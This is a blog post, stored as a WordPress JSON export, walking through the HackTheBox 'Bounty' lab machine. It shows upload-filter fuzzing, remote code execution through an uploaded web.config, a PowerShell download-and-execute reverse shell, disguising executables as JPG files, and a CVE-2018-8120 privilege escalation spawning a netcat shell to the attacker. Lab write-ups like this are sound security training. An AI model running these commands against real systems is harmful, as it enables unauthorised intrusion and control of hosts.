{"id":188,"date":"2018-10-28T20:33:57","date_gmt":"2018-10-28T20:33:57","guid":{"rendered":"https:\/\/zineausa.com\/blog\/?p=188"},"modified":"2018-10-28T20:34:08","modified_gmt":"2018-10-28T20:34:08","slug":"hackthebox-bounty-writeup","status":"publish","type":"post","link":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/","title":{"rendered":"Hackthebox \u2013 Bounty Writeup"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/download-1.jpg\" alt=\"\" width=\"400\" height=\"126\" class=\"alignnone size-full wp-image-189\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/download-1.jpg 400w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/download-1-300x95.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/p>\n<p>This is a writeup for the Bounty machine on hackthebox.eu which was retired on 10\/27\/18!<\/p>\n<p>We first enumerate ports with:<br \/>\n<code>nmap -sC -sV -Pn 10.10.10.93<\/code><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/10-28-2018-12-31-18-AM.png\" alt=\"\" width=\"439\" height=\"99\" class=\"alignnone size-full wp-image-191\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/10-28-2018-12-31-18-AM.png 439w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/10-28-2018-12-31-18-AM-300x68.png 300w\" sizes=\"auto, (max-width: 439px) 100vw, 439px\" \/><\/p>\n<p>Port 80 is open so we go to it and it shows a wizard, nice.<\/p>\n<p>We look around the site and find that the server is Microsoft-IIS\/7.5 but that&#8217;s not very helpful so we keep looking.<\/p>\n<p>We run gobuster to look for some more directories and pages on the server:<br \/>\n<code>sudo apt-get install gobuster<br \/>\ngobuster -w \/usr\/share\/wordlists\/dirbuster\/directory-list-lowercase-2.3-medium.txt -u http:\/\/10.10.10.93\/ -x php,html,txt,dll,aspx,asmx,ashx  -s 200,204,301,302,307,403 -t 100 | tee gobuster_bounty3<\/code><\/p>\n<p>These 4 results came up:<br \/>\n\/UploadedFiles (Status: 301)<br \/>\n\/uploadedFiles (Status: 301)<br \/>\n\/aspnet_client<br \/>\n\/transfer.aspx (Status: 200)<\/p>\n<p>We tried uploading some files but it seems we can only mostly upload image files.<\/p>\n<p>However, to double check, we open Owasp-Zap from the menu of Kali, under the 03-web application analysis menu.<\/p>\n<p>We route our traffic from firefox through the ZAP proxy by setting our traffic in Firefox to go through port 8080 and localhost.<br \/>\n<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzz.png\" alt=\"\" width=\"1095\" height=\"568\" class=\"alignnone size-full wp-image-193\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzz.png 1095w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzz-600x311.png 600w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzz-300x156.png 300w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzz-768x398.png 768w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzz-1024x531.png 1024w\" sizes=\"auto, (max-width: 1095px) 100vw, 1095px\" \/><\/p>\n<p>Now we install a module fromn the &#8220;Add on&#8221; menu called fuzzdb off the marketplace:<br \/>\n<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzdb.png\" alt=\"\" width=\"700\" height=\"477\" class=\"alignnone size-full wp-image-194\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzdb.png 700w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzdb-600x409.png 600w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzdb-300x204.png 300w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/p>\n<p>We highlight the &#8220;png&#8221; at the bottom and then press &#8220;Add&#8221; on the right hand side to add in a list of common extensions.<br \/>\n<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzer1.png\" alt=\"\" width=\"900\" height=\"568\" class=\"alignnone size-full wp-image-195\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzer1.png 900w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzer1-600x379.png 600w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzer1-300x189.png 300w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzer1-768x485.png 768w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/p>\n<p>After running the fuzzer, we see that the 1,110 byte responses are ones that the file upload succeeded on, suggesting we can upload image files and .config files!<br \/>\n<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzer2.png\" alt=\"\" width=\"1095\" height=\"776\" class=\"alignnone size-full wp-image-196\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzer2.png 1095w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzer2-600x425.png 600w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzer2-300x213.png 300w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzer2-768x544.png 768w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/fuzzer2-1024x726.png 1024w\" sizes=\"auto, (max-width: 1095px) 100vw, 1095px\" \/><\/p>\n<p>By googling around a bit, we found this page that suggests we can get RCE with a .config file!<br \/>\n<a href=\"https:\/\/poc-server.com\/blog\/2018\/05\/22\/rce-by-uploading-a-web-config\/\">https:\/\/poc-server.com\/blog\/2018\/05\/22\/rce-by-uploading-a-web-config\/<\/a><\/p>\n<p>We end up uploading this script to get RCE.<br \/>\nhttps:\/\/pastebin.com\/4NBQbKFb<\/p>\n<p>We navigate to 10.10.10.93\/uploadedfiles\/web.config to find a nice cmd prompt we can use.<\/p>\n<p>We use the command: <code>type c:\\users\\merlin\\desktop\\user.txt<\/code> to get the user flag!<br \/>\n<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-05-21-18-27.png\" alt=\"\" width=\"716\" height=\"499\" class=\"alignnone size-full wp-image-197\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-05-21-18-27.png 716w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-05-21-18-27-600x418.png 600w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-05-21-18-27-300x209.png 300w\" sizes=\"auto, (max-width: 716px) 100vw, 716px\" \/><\/p>\n<p><strong>Now to move onto root:<\/strong><\/p>\n<p>We type the following command on our Kali machine to listen on port 7734:<br \/>\n<code>nc -lvnp 7734<\/code><\/p>\n<p>We then download the following reverse shell ps1 file from <a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcp.ps1\">here<\/a>.<\/p>\n<p>We added this snippet of code at the very bottom so we don&#8217;t have to send over another ps command:<br \/>\n<code>Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 7734<\/code><\/p>\n<p>Now we open a new cmd prompt and host the file with a simple HTTP server on our Kali machine using:<br \/>\n<code>mkdir \/www<br \/>\ncd \/www<br \/>\npython -m SimpleHTTPServer 80<\/code><\/p>\n<p>We put save the powershell file we just edited in \/www as rev.ps1.<\/p>\n<p>We then type the following command into the prompt to send a reverse shell connection back to our Kali machine:<br \/>\n<code>powershell \"IEX(New-Object Net.WebClient).downloadString('http:\/\/10.10.14.5\/rev.ps1')\"<\/code><br \/>\n<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-26-07.png\" alt=\"\" width=\"513\" height=\"440\" class=\"alignnone size-full wp-image-198\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-26-07.png 513w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-26-07-300x257.png 300w\" sizes=\"auto, (max-width: 513px) 100vw, 513px\" \/><\/p>\n<p>Now.. we have a reverse shell.. we type systeminfo to see that it is a 2008 Server R2<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-29-56.png\" alt=\"\" width=\"1063\" height=\"769\" class=\"alignnone size-full wp-image-199\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-29-56.png 1063w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-29-56-600x434.png 600w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-29-56-300x217.png 300w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-29-56-768x556.png 768w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-29-56-1024x741.png 1024w\" sizes=\"auto, (max-width: 1063px) 100vw, 1063px\" \/><\/p>\n<p>So we google for &#8220;Windows Server 2008 R2 exploits&#8221; and we find an exploit called CVE-2018-8120 to help us get privesc <a href=\"https:\/\/github.com\/unamer\/CVE-2018-8120\/tree\/master\/x64\/Release\">here<\/a>.<\/p>\n<p>we upload nc64.exe from <a href=\"https:\/\/eternallybored.org\/misc\/netcat\/\">here<\/a> to use for the reverse shell, as well as the x64 exploit from CVE-2018-8120 as JPG files, move them over to c:\\users\\merlin\\desktop, and rename them back to .exe files.<\/p>\n<p>We then run the following command in our shell:<br \/>\n<code>& \"C:\\users\\merlin\\desktop\\x64.exe\" \"c:\\users\\merlin\\desktop\\nc64.exe 10.10.14.5 7735 -e cmd.exe\"<\/code><\/p>\n<p>(Make sure you are catching with nc -lvnp 7735)<\/p>\n<p>we have the shell! now just type c:\\users\\administrator\\desktop\\root.txt and we have the root flag.<br \/>\n<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-22-58.png\" alt=\"\" width=\"1029\" height=\"660\" class=\"alignnone size-full wp-image-200\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-22-58.png 1029w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-22-58-600x385.png 600w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-22-58-300x192.png 300w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-22-58-768x493.png 768w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-08-02-22-58-1024x657.png 1024w\" sizes=\"auto, (max-width: 1029px) 100vw, 1029px\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This is a writeup for the Bounty machine on hackthebox.eu which was retired on 10\/27\/18! We first enumerate ports with: nmap -sC -sV -Pn 10.10.10.93 Port 80 is open so we go to it and it shows a wizard, nice. We look around the site and find that the server is Microsoft-IIS\/7.5 but that&#8217;s not [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,6],"tags":[],"class_list":["post-188","post","type-post","status-publish","format-standard","hentry","category-hackthebox","category-writeups"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Hackthebox \u2013 Bounty Writeup - Zinea InfoSec Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Hackthebox \u2013 Bounty Writeup - Zinea InfoSec Blog\" \/>\n<meta property=\"og:description\" content=\"This is a writeup for the Bounty machine on hackthebox.eu which was retired on 10\/27\/18! We first enumerate ports with: nmap -sC -sV -Pn 10.10.10.93 Port 80 is open so we go to it and it shows a wizard, nice. We look around the site and find that the server is Microsoft-IIS\/7.5 but that&#8217;s not [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/\" \/>\n<meta property=\"og:site_name\" content=\"Zinea InfoSec Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/zineausa\/\" \/>\n<meta property=\"article:published_time\" content=\"2018-10-28T20:33:57+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-10-28T20:34:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/download-1.jpg\" \/>\n<meta name=\"author\" content=\"Zinea\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ZineaLLC\" \/>\n<meta name=\"twitter:site\" content=\"@ZineaLLC\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Zinea\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/\"},\"author\":{\"name\":\"Zinea\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/person\\\/e3c58d4f0650f7fb571c01fcf836b1d0\"},\"headline\":\"Hackthebox \u2013 Bounty Writeup\",\"datePublished\":\"2018-10-28T20:33:57+00:00\",\"dateModified\":\"2018-10-28T20:34:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/\"},\"wordCount\":487,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/10\\\/download-1.jpg\",\"articleSection\":[\"HackTheBox\",\"Writeups\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/\",\"name\":\"Hackthebox \u2013 Bounty Writeup - Zinea InfoSec Blog\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/10\\\/download-1.jpg\",\"datePublished\":\"2018-10-28T20:33:57+00:00\",\"dateModified\":\"2018-10-28T20:34:08+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/#primaryimage\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/10\\\/download-1.jpg\",\"contentUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/10\\\/download-1.jpg\",\"width\":400,\"height\":126},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2018\\\/10\\\/hackthebox-bounty-writeup\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Hackthebox \u2013 Bounty Writeup\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\",\"name\":\"Zinea InfoSec Blog\",\"description\":\"Cyber Security Resources\",\"publisher\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\",\"name\":\"Zinea LLC\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/05\\\/zinea-square.png\",\"contentUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/05\\\/zinea-square.png\",\"width\":876,\"height\":876,\"caption\":\"Zinea LLC\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/zineausa\\\/\",\"https:\\\/\\\/x.com\\\/ZineaLLC\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/person\\\/e3c58d4f0650f7fb571c01fcf836b1d0\",\"name\":\"Zinea\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"caption\":\"Zinea\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Hackthebox \u2013 Bounty Writeup - Zinea InfoSec Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/","og_locale":"en_US","og_type":"article","og_title":"Hackthebox \u2013 Bounty Writeup - Zinea InfoSec Blog","og_description":"This is a writeup for the Bounty machine on hackthebox.eu which was retired on 10\/27\/18! We first enumerate ports with: nmap -sC -sV -Pn 10.10.10.93 Port 80 is open so we go to it and it shows a wizard, nice. We look around the site and find that the server is Microsoft-IIS\/7.5 but that&#8217;s not [&hellip;]","og_url":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/","og_site_name":"Zinea InfoSec Blog","article_publisher":"https:\/\/www.facebook.com\/zineausa\/","article_published_time":"2018-10-28T20:33:57+00:00","article_modified_time":"2018-10-28T20:34:08+00:00","og_image":[{"url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/download-1.jpg","type":"","width":"","height":""}],"author":"Zinea","twitter_card":"summary_large_image","twitter_creator":"@ZineaLLC","twitter_site":"@ZineaLLC","twitter_misc":{"Written by":"Zinea","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/#article","isPartOf":{"@id":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/"},"author":{"name":"Zinea","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/person\/e3c58d4f0650f7fb571c01fcf836b1d0"},"headline":"Hackthebox \u2013 Bounty Writeup","datePublished":"2018-10-28T20:33:57+00:00","dateModified":"2018-10-28T20:34:08+00:00","mainEntityOfPage":{"@id":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/"},"wordCount":487,"commentCount":0,"publisher":{"@id":"https:\/\/zineausa.com\/blog\/#organization"},"image":{"@id":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/#primaryimage"},"thumbnailUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/download-1.jpg","articleSection":["HackTheBox","Writeups"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/","url":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/","name":"Hackthebox \u2013 Bounty Writeup - Zinea InfoSec Blog","isPartOf":{"@id":"https:\/\/zineausa.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/#primaryimage"},"image":{"@id":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/#primaryimage"},"thumbnailUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/download-1.jpg","datePublished":"2018-10-28T20:33:57+00:00","dateModified":"2018-10-28T20:34:08+00:00","breadcrumb":{"@id":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/#primaryimage","url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/download-1.jpg","contentUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/download-1.jpg","width":400,"height":126},{"@type":"BreadcrumbList","@id":"https:\/\/zineausa.com\/blog\/2018\/10\/hackthebox-bounty-writeup\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zineausa.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Hackthebox \u2013 Bounty Writeup"}]},{"@type":"WebSite","@id":"https:\/\/zineausa.com\/blog\/#website","url":"https:\/\/zineausa.com\/blog\/","name":"Zinea InfoSec Blog","description":"Cyber Security Resources","publisher":{"@id":"https:\/\/zineausa.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zineausa.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zineausa.com\/blog\/#organization","name":"Zinea LLC","url":"https:\/\/zineausa.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/05\/zinea-square.png","contentUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/05\/zinea-square.png","width":876,"height":876,"caption":"Zinea LLC"},"image":{"@id":"https:\/\/zineausa.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/zineausa\/","https:\/\/x.com\/ZineaLLC"]},{"@type":"Person","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/person\/e3c58d4f0650f7fb571c01fcf836b1d0","name":"Zinea","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","caption":"Zinea"}}]}},"_links":{"self":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/188","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/comments?post=188"}],"version-history":[{"count":3,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/188\/revisions"}],"predecessor-version":[{"id":202,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/188\/revisions\/202"}],"wp:attachment":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/media?parent=188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/categories?post=188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/tags?post=188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}